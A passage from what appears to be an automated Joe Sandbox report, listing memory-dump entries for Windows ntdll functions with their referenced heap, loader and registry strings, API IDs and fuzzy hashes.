                                                  • HEAP[%wZ]: , xrefs: 35F91632
                                                  • HEAP: , xrefs: 35F914B6
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: a41bd8584f70722e03e26357099dff93e86072a6d41035581c9e79105c63f1ef
                                                  • Instruction ID: 5e014e27daeb6f8ca6c7b1986ec7e264d8976b1532c02bc91e30e3e11b89a45a
                                                  • Opcode Fuzzy Hash: a41bd8584f70722e03e26357099dff93e86072a6d41035581c9e79105c63f1ef
                                                  • Instruction Fuzzy Hash: 07E10075A04B859BE719DF28C480ABABBF5BF49340F148C6DE496CB245E734E941CB50
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 360000F1
                                                  • RTL: Re-Waiting, xrefs: 36000128
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 360000C7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: 08641cc47caf80bd7022f02a3c1965dda6a459547afe70576e3901b4b362bae2
                                                  • Instruction ID: 2aed76b24a6cafcdd3209ed74882466d49833d3c6d64186a85b4a6fc13d78e75
                                                  • Opcode Fuzzy Hash: 08641cc47caf80bd7022f02a3c1965dda6a459547afe70576e3901b4b362bae2
                                                  • Instruction Fuzzy Hash: 5BE1CE75A08741DFEB11CF69C981B0ABBE1BF84354F100E99F5A58B2E1DBB4D944CB82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-1145731471
                                                  • Opcode ID: ae1605469535d83fd9e2774f24910d91d60e42aa56959dfcd7a94f8e56ae246b
                                                  • Instruction ID: d1e15132edd70dac294ed36a5c5637fdfca2042e76a9381ddf073cfd536a43bd
                                                  • Opcode Fuzzy Hash: ae1605469535d83fd9e2774f24910d91d60e42aa56959dfcd7a94f8e56ae246b
                                                  • Instruction Fuzzy Hash: A3B19979A08B458BEB19CF64C990B9DB7B6BF84744F104D69E851EBBA0D771E840CB10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                  • API String ID: 0-2391371766
                                                  • Opcode ID: 1ed93655edd7be14422e5794594f614b7815f22ae22b6bf2ec7cb1f3756e9d81
                                                  • Instruction ID: b811f9a0397205821d96d3ac252404df1149827296d78bed0973616e9cb91454
                                                  • Opcode Fuzzy Hash: 1ed93655edd7be14422e5794594f614b7815f22ae22b6bf2ec7cb1f3756e9d81
                                                  • Instruction Fuzzy Hash: 76B1E379614349AFE315CF61C882F5BBBF8FB44754F414969FA809B280C775E848CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                  • API String ID: 0-318774311
                                                  • Opcode ID: c8c812eb718a3b09d4a222fb8bd961a2d9c5f3ffe9db322ecdb9a67a592d396e
                                                  • Instruction ID: 73c8dcfad28c0292e8824e103387adbf22992767593fba52949ecdabb9fecdc2
                                                  • Opcode Fuzzy Hash: c8c812eb718a3b09d4a222fb8bd961a2d9c5f3ffe9db322ecdb9a67a592d396e
                                                  • Instruction Fuzzy Hash: 9C81BF75608350AFE315CB25C841B6BBBE8FF84B54F4409ADF9849B290DB75DE40CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                  • API String ID: 0-3870751728
                                                  • Opcode ID: e42bfa9743810666bf5ea421f060e008685b21c1399ec5cda4231e7fc805c874
                                                  • Instruction ID: ea954a18b237a3cbe796e218c3a278eba1e97cb3f9ae3d414519e7a1ac6f8c0c
                                                  • Opcode Fuzzy Hash: e42bfa9743810666bf5ea421f060e008685b21c1399ec5cda4231e7fc805c874
                                                  • Instruction Fuzzy Hash: 93914FB4E006159FEB14CF59C885B9DBBF1FF48304F2481AAE904AB351E7759942CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-373624363
                                                  • Opcode ID: 8f8b594a5c7e22a8193501b468e721a46a72df6eed983298c24095ffaa213b5f
                                                  • Instruction ID: 5249df343cfae5939f7ed174943bfbc20cc011d00e702e4febc3b51572cf1408
                                                  • Opcode Fuzzy Hash: 8f8b594a5c7e22a8193501b468e721a46a72df6eed983298c24095ffaa213b5f
                                                  • Instruction Fuzzy Hash: 7691DFB6A08B49CBEB19CF58C840BEDB7B5FF40354F144999E801AB3D4D7799A80CB91
                                                  Strings
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3606B3AA
                                                  • GlobalizationUserSettings, xrefs: 3606B3B4
                                                  • TargetNtPath, xrefs: 3606B3AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  • Opcode ID: e364e33cac83ea0976326c6eb188f701ae0289ada57f82374dfe3b22066660d8
                                                  • Instruction ID: add4b2adef3aab541623019be90228373c51f5e2594f17a766cffef4a15b8070
                                                  • Opcode Fuzzy Hash: e364e33cac83ea0976326c6eb188f701ae0289ada57f82374dfe3b22066660d8
                                                  • Instruction Fuzzy Hash: 906190B2D41229ABDB21DF56DC89BD9BBB8EB04714F4101E5E908A7250DB74DE84CF90
                                                  Strings
                                                  • HEAP[%wZ]: , xrefs: 35FEE435
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 35FEE455
                                                  • HEAP: , xrefs: 35FEE442
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: dddb51edd639edfdd6b65f4e54176a422dc312d9f89844cdb93c27f56f83a199
                                                  • Instruction ID: 8c97b015ea1c2a44e8e81e66d8ba05da7e8ebbdfcda7afe60c8af7908402f2e4
                                                  • Opcode Fuzzy Hash: dddb51edd639edfdd6b65f4e54176a422dc312d9f89844cdb93c27f56f83a199
                                                  • Instruction Fuzzy Hash: 63511336744784AFF312CBA8C884F9ABBF8FF04748F0448A5E6518B692D774E940CB51
                                                  Strings
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 35FFA3A7
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 35FFA396
                                                  • LdrpCompleteMapModule, xrefs: 35FFA39D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: 92a1f327b2dbaf4ef0bf245899e2c6fe50256be77f3a06f234e4bec0e707c101
                                                  • Instruction ID: 09dfe7f3f6097e8a1f55d3422783bd1ab480403d09144890dc68bc55ac4c2bbe
                                                  • Opcode Fuzzy Hash: 92a1f327b2dbaf4ef0bf245899e2c6fe50256be77f3a06f234e4bec0e707c101
                                                  • Instruction Fuzzy Hash: 9B511479A04781DBEB11DB69C944F0A77E5BF00B54F100E94ED939BAE1DBB1EA00CB41
                                                  Strings
                                                  • HEAP[%wZ]: , xrefs: 3603D792
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3603D7B2
                                                  • HEAP: , xrefs: 3603D79F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: daa702d7d98b5df0beab661713f632d7680fb2dc61c12e8ea420f008877ad343
                                                  • Instruction ID: a3e75d3f79609cbebf3ebd6167eacb009a302cb99262dd7982cc90f8fef2e94c
                                                  • Opcode Fuzzy Hash: daa702d7d98b5df0beab661713f632d7680fb2dc61c12e8ea420f008877ad343
                                                  • Instruction Fuzzy Hash: 015116795123608AF351CB2AC4427767BE2EF4528AF714CC9E4F58B1C1E636D487DBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: ba729bc62f43f7092ae72fb0802b44e5430a5ea8a03ddad5e431449a99edf42e
                                                  • Instruction ID: 7b0b112c5b90d78d6214fb7d1f94ec0684d052c6349239d1e87684bcf7aa2992
                                                  • Opcode Fuzzy Hash: ba729bc62f43f7092ae72fb0802b44e5430a5ea8a03ddad5e431449a99edf42e
                                                  • Instruction Fuzzy Hash: 274188792053508FEB26CF18C4C8B6577EABF01345F644CAAC8C68F66ACB76D485CB21
                                                  Strings
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 36001954
                                                  • LdrpAllocateTls, xrefs: 3600194A
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36001943
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: b1e9bdb9dfdee9ab1493f9c0676a764b203d6883663f64b7624500f67abaff84
                                                  • Instruction ID: b8ca3a924698db1266f0960623afab9fe77c0afcebdcaae79de23eced4309593
                                                  • Opcode Fuzzy Hash: b1e9bdb9dfdee9ab1493f9c0676a764b203d6883663f64b7624500f67abaff84
                                                  • Instruction Fuzzy Hash: 0B416DB5A00609EFEB15CFA9C841AAEBBF6FF48300F0449A9E405A7251DB75A911CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                  • API String ID: 0-1373925480
                                                  • Opcode ID: ad99c6478f94c215a620786c7ac0fa3503a577269bbc191462b3f144e41d143c
                                                  • Instruction ID: 54b3459ea7afcd2f8c0386a6cd669ca3e51a3879815af9a9eab81738666e936d
                                                  • Opcode Fuzzy Hash: ad99c6478f94c215a620786c7ac0fa3503a577269bbc191462b3f144e41d143c
                                                  • Instruction Fuzzy Hash: D841E076A04394CFEB19DBA5E941B9DBBF8EF45744F20049AD800EF391EB348941CB51
                                                  Strings
                                                  • RtlCreateActivationContext, xrefs: 36002803
                                                  • SXS: %s() passed the empty activation context data, xrefs: 36002808
                                                  • Actx , xrefs: 35FC32CC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                  • API String ID: 0-859632880
                                                  • Opcode ID: ef05987374c048f515de12b44cf1f90122ddc7c870801c14d117f3edbcb5df99
                                                  • Instruction ID: 01e88ef1ffd2159a94553c3c9da3ab99acbc7dd30df3522278f68cec6a7f5323
                                                  • Opcode Fuzzy Hash: ef05987374c048f515de12b44cf1f90122ddc7c870801c14d117f3edbcb5df99
                                                  • Instruction Fuzzy Hash: 46311076A403069BEB01CF59D8C1B9A3BA4EB44794F5148B9EC059F281CBB0D909CBD1
                                                  Strings
                                                  • GlobalFlag, xrefs: 3601B30F
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3601B2B2
                                                  • @, xrefs: 3601B2F0
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: 2a1525c37a9d9e554332f51c61674367276c8e4f4d491af9c74b56dc1da7b590
                                                  • Instruction ID: e2cd619ab239a92ae57f2855db3bc4efe853aa9c7b2b7899eca65ab0b65279b4
                                                  • Opcode Fuzzy Hash: 2a1525c37a9d9e554332f51c61674367276c8e4f4d491af9c74b56dc1da7b590
                                                  • Instruction Fuzzy Hash: BF315DB5E00209AFDB10DF95DC81BEEBBBCEF44744F4408A9E601A7241D7749E05CB90
                                                  Strings
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 3600184A
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 3600185B
                                                  • LdrpInitializeTls, xrefs: 36001851
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 39070f5f30a068a3ef2cbb1c2a06a8fa44e94c48eb6eeb32577b14b8f19fc557
                                                  • Instruction ID: 8e2af347c5c93aea4b4ed781a8a6db5c98eafc3e5546449ab3db410a071f0bb4
                                                  • Opcode Fuzzy Hash: 39070f5f30a068a3ef2cbb1c2a06a8fa44e94c48eb6eeb32577b14b8f19fc557
                                                  • Instruction Fuzzy Hash: 9E31F372A10346AFF715DA95C842F5A7BB9AF40384F010CF9E602B7180DBB0ED558B90
                                                  Strings
                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 35FD119B
                                                  • @, xrefs: 35FD11C5
                                                  • BuildLabEx, xrefs: 35FD122F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 0-3051831665
                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                  • Instruction ID: 71d4034db9f1751347f855ab98a3236ad887e486b4c36531aef3c386a5fc8201
                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                  • Instruction Fuzzy Hash: 07318F72A00659BBDB12DB95CC44EAFFBBDEB84750F144825E504A72A4D731DA05CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@
                                                  • API String ID: 0-149943524
                                                  • Opcode ID: fcf8d0e8250f37b084dbbfd39eecf19bca188043039ac3126e0c154b5c44b91e
                                                  • Instruction ID: b2bd76862994454caf03264524e4c5b71d8a7a25ed6d84e2f3c4fbc018dbb081
                                                  • Opcode Fuzzy Hash: fcf8d0e8250f37b084dbbfd39eecf19bca188043039ac3126e0c154b5c44b91e
                                                  • Instruction Fuzzy Hash: F9326BBA6083118BDB14CF14C480A3EB7F6BF88744F504D2EE996976A0EB75D944CB93
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: ee60e671be07cd3be2165eef6bf1f5728decabde63aa6a6534f96a4dcb1b9b97
                                                  • Instruction ID: 08f625489d2b7a3251e485195ca63af8284f8ced84dd9a631938e1e00f7b95d1
                                                  • Opcode Fuzzy Hash: ee60e671be07cd3be2165eef6bf1f5728decabde63aa6a6534f96a4dcb1b9b97
                                                  • Instruction Fuzzy Hash: 9E31A035305B42EBE749DB65CA40E9AFB7ABF84754F404825E90147A60DBB1E821CFD0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 176067137f0e49265057ab03f2aeab9befb60ff46957010b586e3e800cd2b297
                                                  • Instruction ID: ff4705dc0c5ad573915b5cff0c4afc85c8052997bc6806e1e083676074d94b06
                                                  • Opcode Fuzzy Hash: 176067137f0e49265057ab03f2aeab9befb60ff46957010b586e3e800cd2b297
                                                  • Instruction Fuzzy Hash: 4911E775B14219ABEB09DB5CC986A5EBBF9EB88764F2101A9E546F3300DA709D00C794
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                  • Instruction ID: 4d4e11120338dfdc4d66204b4bd971723501a3602a77dc81cb9877e08c484072
                                                  • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                  • Instruction Fuzzy Hash: 1CC10F716083429BE714CF2AC842B1BBFE5BFC4358F014A6DFA95DA290D7B5D944CB82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$AddD
                                                  • API String ID: 0-2525844869
                                                  • Opcode ID: dae0b5846333ff938208c4a781545132d403699a287e4bd2a052ce04111c4ba2
                                                  • Instruction ID: aa72ca5b5edf3b8d991b1a90e5015d9da48fd66daf0bcf56f2fb7684f543fd21
                                                  • Opcode Fuzzy Hash: dae0b5846333ff938208c4a781545132d403699a287e4bd2a052ce04111c4ba2
                                                  • Instruction Fuzzy Hash: 09A19E7A604304AFE308CB11C845BABBBF9FF84704F544AAEF99486250E770E909CB52
                                                  Strings
                                                  • RedirectedKey, xrefs: 3606B60E
                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3606B5C4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                   • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                  • API String ID: 0-1388552009
                                                  • Opcode ID: 553cfeddd06e3f9a1e685f6bbef7932e8da17e90970efa1bac56cdd3a4ab3970
                                                  • Instruction ID: 68b3a2c45b9ae933b4389f57a5dff16ed692f8d8456e4a246a184f2d0d2a1eba
                                                  • Opcode Fuzzy Hash: 553cfeddd06e3f9a1e685f6bbef7932e8da17e90970efa1bac56cdd3a4ab3970
                                                  • Instruction Fuzzy Hash: F061E5B5C11219EBDF11DF96C889ADEBFB9FB08714F5040AAE505E7240EB349A45CF90
                                                  Strings
                                                  Memory Dump Source
